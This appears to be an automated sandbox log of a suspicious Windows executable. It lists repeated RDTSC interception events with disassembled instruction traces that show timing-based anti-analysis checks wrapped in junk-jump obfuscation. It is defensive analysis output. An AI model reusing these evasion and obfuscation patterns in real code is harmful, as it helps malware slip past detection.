Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40179 second address: 6F4019E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d mov bh, ch 0x0000000f mov bh, A0h 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4019E second address: 6F401FE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FB6E8B0AEDDh 0x00000008 sub esi, 586515F6h 0x0000000e jmp 00007FB6E8B0AEE1h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FB6E8B0AEDEh 0x0000001d xor ch, 00000018h 0x00000020 jmp 00007FB6E8B0AEDBh 0x00000025 popfd 0x00000026 mov dx, ax 0x00000029 popad 0x0000002a popad 0x0000002b xchg eax, esi 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FB6E8B0AEDEh 0x00000034 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4033F second address: 6F40343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40343 second address: 6F40347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40347 second address: 6F4034D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4034D second address: 6F40353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40353 second address: 6F40357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40357 second address: 6F4035B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4035B second address: 6F40371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB6E8B0C7EBh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40371 second address: 6F40377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40377 second address: 6F4037B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4037B second address: 6F403D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c pushad 0x0000000d mov bx, si 0x00000010 mov edi, esi 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 mov ebx, 621D219Eh 0x0000001a movsx ebx, cx 0x0000001d popad 0x0000001e xchg eax, edi 0x0000001f jmp 00007FB6E8B0AEDEh 0x00000024 push dword ptr [eax] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 jmp 00007FB6E8B0AEDDh 0x0000002e jmp 00007FB6E8B0AEE0h 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4046A second address: 6F40520 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FB757E0BA07h 0x0000000f jmp 00007FB6E8B0C7EEh 0x00000014 sub eax, eax 0x00000016 pushad 0x00000017 movsx ebx, cx 0x0000001a jmp 00007FB6E8B0C7F8h 0x0000001f popad 0x00000020 mov dword ptr [esi], edi 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FB6E8B0C7EEh 0x00000029 add eax, 77F09438h 0x0000002f jmp 00007FB6E8B0C7EBh 0x00000034 popfd 0x00000035 pushfd 0x00000036 jmp 00007FB6E8B0C7F8h 0x0000003b add ch, FFFFFF98h 0x0000003e jmp 00007FB6E8B0C7EBh 0x00000043 popfd 0x00000044 popad 0x00000045 mov dword ptr [esi+04h], eax 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b call 00007FB6E8B0C7F2h 0x00000050 pop esi 0x00000051 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40520 second address: 6F405B5 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 2501A436h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esi+08h], eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FB6E8B0AEDFh 0x00000014 sbb ecx, 15B88CBEh 0x0000001a jmp 00007FB6E8B0AEE9h 0x0000001f popfd 0x00000020 call 00007FB6E8B0AEE0h 0x00000025 jmp 00007FB6E8B0AEE2h 0x0000002a pop eax 0x0000002b popad 0x0000002c mov dword ptr [esi+0Ch], eax 0x0000002f jmp 00007FB6E8B0AEE1h 0x00000034 mov eax, dword ptr [ebx+4Ch] 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FB6E8B0AEE8h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F405B5 second address: 6F405B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F405B9 second address: 6F405BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F405BF second address: 6F4065A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB6E8B0C7ECh 0x00000008 pushfd 0x00000009 jmp 00007FB6E8B0C7F2h 0x0000000e sub esi, 3FB8DCD8h 0x00000014 jmp 00007FB6E8B0C7EBh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [esi+10h], eax 0x00000020 jmp 00007FB6E8B0C7F6h 0x00000025 mov eax, dword ptr [ebx+50h] 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FB6E8B0C7EDh 0x00000031 jmp 00007FB6E8B0C7EBh 0x00000036 popfd 0x00000037 pushfd 0x00000038 jmp 00007FB6E8B0C7F8h 0x0000003d sbb ax, 20C8h 0x00000042 jmp 00007FB6E8B0C7EBh 0x00000047 popfd 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4065A second address: 6F40660 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40660 second address: 6F40664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40664 second address: 6F40668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40668 second address: 6F406BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+14h], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FB6E8B0C7F3h 0x00000013 and esi, 134B77BEh 0x00000019 jmp 00007FB6E8B0C7F9h 0x0000001e popfd 0x0000001f push esi 0x00000020 pop edx 0x00000021 popad 0x00000022 mov eax, 45DDA6A3h 0x00000027 popad 0x00000028 mov eax, dword ptr [ebx+54h] 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F406BB second address: 6F406BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F406BF second address: 6F406C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F406C5 second address: 6F406CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F406CB second address: 6F406CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F407E9 second address: 6F40826 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pop edi 0x0000000b popad 0x0000000c mov dword ptr [esi+24h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FB6E8B0AEE5h 0x00000017 push eax 0x00000018 pop edi 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40826 second address: 6F4082C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4082C second address: 6F40868 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+64h] 0x0000000b jmp 00007FB6E8B0AEDBh 0x00000010 mov dword ptr [esi+28h], eax 0x00000013 jmp 00007FB6E8B0AEE6h 0x00000018 mov eax, dword ptr [ebx+68h] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov bx, 7BC0h 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40868 second address: 6F40877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6E8B0C7EBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40877 second address: 6F4087B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4087B second address: 6F40890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+2Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov bx, si 0x00000011 mov bx, si 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40890 second address: 6F408CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 mov ebx, 6C2E84E4h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ax, word ptr [ebx+6Ch] 0x00000011 jmp 00007FB6E8B0AEE3h 0x00000016 mov word ptr [esi+30h], ax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FB6E8B0AEE5h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F408CF second address: 6F408DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6E8B0C7ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F408DF second address: 6F4090E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ax, word ptr [ebx+00000088h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB6E8B0AEE5h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4090E second address: 6F4094E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 4A2E4622h 0x00000008 pushfd 0x00000009 jmp 00007FB6E8B0C7F3h 0x0000000e jmp 00007FB6E8B0C7F3h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov word ptr [esi+32h], ax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ah, dh 0x00000020 movzx eax, di 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4094E second address: 6F40A00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB6E8B0AEE4h 0x00000008 mov ah, 6Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+0000008Ch] 0x00000013 pushad 0x00000014 jmp 00007FB6E8B0AEE3h 0x00000019 mov ch, C2h 0x0000001b popad 0x0000001c mov dword ptr [esi+34h], eax 0x0000001f jmp 00007FB6E8B0AEDBh 0x00000024 mov eax, dword ptr [ebx+18h] 0x00000027 pushad 0x00000028 push eax 0x00000029 pushad 0x0000002a popad 0x0000002b pop ebx 0x0000002c call 00007FB6E8B0AEDEh 0x00000031 mov ax, 64A1h 0x00000035 pop ecx 0x00000036 popad 0x00000037 mov dword ptr [esi+38h], eax 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007FB6E8B0AEE3h 0x00000041 sbb ecx, 0AAB054Eh 0x00000047 jmp 00007FB6E8B0AEE9h 0x0000004c popfd 0x0000004d popad 0x0000004e mov eax, dword ptr [ebx+1Ch] 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FB6E8B0AEDFh 0x0000005a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40A00 second address: 6F40A04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40A04 second address: 6F40A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40A0A second address: 6F40A5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FB6E8B0C7F2h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007FB6E8B0C7EBh 0x0000000f xor ecx, 514C38BEh 0x00000015 jmp 00007FB6E8B0C7F9h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov dword ptr [esi+3Ch], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 movsx edi, cx 0x00000027 mov bx, ax 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40A5C second address: 6F40A6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6E8B0AEDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40A6C second address: 6F40A70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40A70 second address: 6F40A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+20h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB6E8B0AEDAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40A87 second address: 6F40B68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB6E8B0C7F1h 0x00000008 push eax 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+40h], eax 0x00000010 jmp 00007FB6E8B0C7EAh 0x00000015 lea eax, dword ptr [ebx+00000080h] 0x0000001b pushad 0x0000001c call 00007FB6E8B0C7EEh 0x00000021 jmp 00007FB6E8B0C7F2h 0x00000026 pop ecx 0x00000027 mov edi, 432DC716h 0x0000002c popad 0x0000002d push 00000001h 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FB6E8B0C7F3h 0x00000036 jmp 00007FB6E8B0C7F3h 0x0000003b popfd 0x0000003c mov si, 856Fh 0x00000040 popad 0x00000041 nop 0x00000042 jmp 00007FB6E8B0C7F2h 0x00000047 push eax 0x00000048 pushad 0x00000049 pushfd 0x0000004a jmp 00007FB6E8B0C7F1h 0x0000004f sbb esi, 61D40486h 0x00000055 jmp 00007FB6E8B0C7F1h 0x0000005a popfd 0x0000005b movzx ecx, di 0x0000005e popad 0x0000005f nop 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007FB6E8B0C7F5h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40B68 second address: 6F40B6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40B6C second address: 6F40B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40B72 second address: 6F40BE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, A3E9h 0x00000007 mov di, si 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d lea eax, dword ptr [ebp-10h] 0x00000010 jmp 00007FB6E8B0AEE0h 0x00000015 nop 0x00000016 pushad 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FB6E8B0AEDCh 0x0000001e xor cl, FFFFFFE8h 0x00000021 jmp 00007FB6E8B0AEDBh 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007FB6E8B0AEE8h 0x0000002d or ch, 00000048h 0x00000030 jmp 00007FB6E8B0AEDBh 0x00000035 popfd 0x00000036 popad 0x00000037 push eax 0x00000038 push edx 0x00000039 mov si, 7BD5h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40BE0 second address: 6F40C01 instructions: 0x00000000 rdtsc 0x00000002 call 00007FB6E8B0C7F2h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov esi, edi 0x00000011 push ebx 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40CC1 second address: 6F40D31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FB6E8B0AEDDh 0x0000000b or eax, 3C34CBA6h 0x00000011 jmp 00007FB6E8B0AEE1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test edi, edi 0x0000001c jmp 00007FB6E8B0AEDEh 0x00000021 js 00007FB757E0989Ah 0x00000027 jmp 00007FB6E8B0AEE0h 0x0000002c mov eax, dword ptr [ebp-0Ch] 0x0000002f jmp 00007FB6E8B0AEE0h 0x00000034 mov dword ptr [esi+04h], eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40D31 second address: 6F40D4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40D4E second address: 6F40D62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 0Ah 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+78h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edx, eax 0x00000010 movzx eax, dx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40D62 second address: 6F40D94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, ax 0x00000006 pushfd 0x00000007 jmp 00007FB6E8B0C7EEh 0x0000000c add eax, 56F29398h 0x00000012 jmp 00007FB6E8B0C7EBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push 00000001h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov ecx, ebx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40D94 second address: 6F40E2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB6E8B0AEE6h 0x00000009 or esi, 651A9528h 0x0000000f jmp 00007FB6E8B0AEDBh 0x00000014 popfd 0x00000015 mov ax, 6A1Fh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c nop 0x0000001d pushad 0x0000001e jmp 00007FB6E8B0AEE0h 0x00000023 pushfd 0x00000024 jmp 00007FB6E8B0AEE2h 0x00000029 xor eax, 436022B8h 0x0000002f jmp 00007FB6E8B0AEDBh 0x00000034 popfd 0x00000035 popad 0x00000036 push eax 0x00000037 pushad 0x00000038 mov esi, edi 0x0000003a movsx ebx, ax 0x0000003d popad 0x0000003e nop 0x0000003f jmp 00007FB6E8B0AEDAh 0x00000044 lea eax, dword ptr [ebp-08h] 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FB6E8B0AEE7h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40E2E second address: 6F40E50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40F20 second address: 6F40F51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FB6E8B0AEDEh 0x00000014 add al, 00000018h 0x00000017 jmp 00007FB6E8B0AEDBh 0x0000001c popfd 0x0000001d mov ax, BBCFh 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40F51 second address: 6F40F89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 push ebx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FB757E0AF43h 0x00000011 pushad 0x00000012 mov di, 20EAh 0x00000016 mov bx, 61B6h 0x0000001a popad 0x0000001b mov eax, dword ptr [ebp-04h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FB6E8B0C7F8h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40F89 second address: 6F40FB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB6E8B0AEE1h 0x00000009 add ax, 4DC6h 0x0000000e jmp 00007FB6E8B0AEE1h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40FB7 second address: 6F40FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esi+08h], eax 0x0000000a pushad 0x0000000b jmp 00007FB6E8B0C7EAh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F40FCE second address: 6F4100C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a lea eax, dword ptr [ebx+70h] 0x0000000d pushad 0x0000000e movzx eax, dx 0x00000011 popad 0x00000012 push 00000001h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FB6E8B0AEE6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4100C second address: 6F4107B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB6E8B0C7F1h 0x00000009 add eax, 7B071896h 0x0000000f jmp 00007FB6E8B0C7F1h 0x00000014 popfd 0x00000015 call 00007FB6E8B0C7F0h 0x0000001a pop esi 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push esp 0x0000001f pushad 0x00000020 movzx esi, dx 0x00000023 mov ecx, edx 0x00000025 popad 0x00000026 mov dword ptr [esp], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FB6E8B0C7ECh 0x00000032 sbb cl, 00000018h 0x00000035 jmp 00007FB6E8B0C7EBh 0x0000003a popfd 0x0000003b movzx ecx, bx 0x0000003e popad 0x0000003f rdtsc
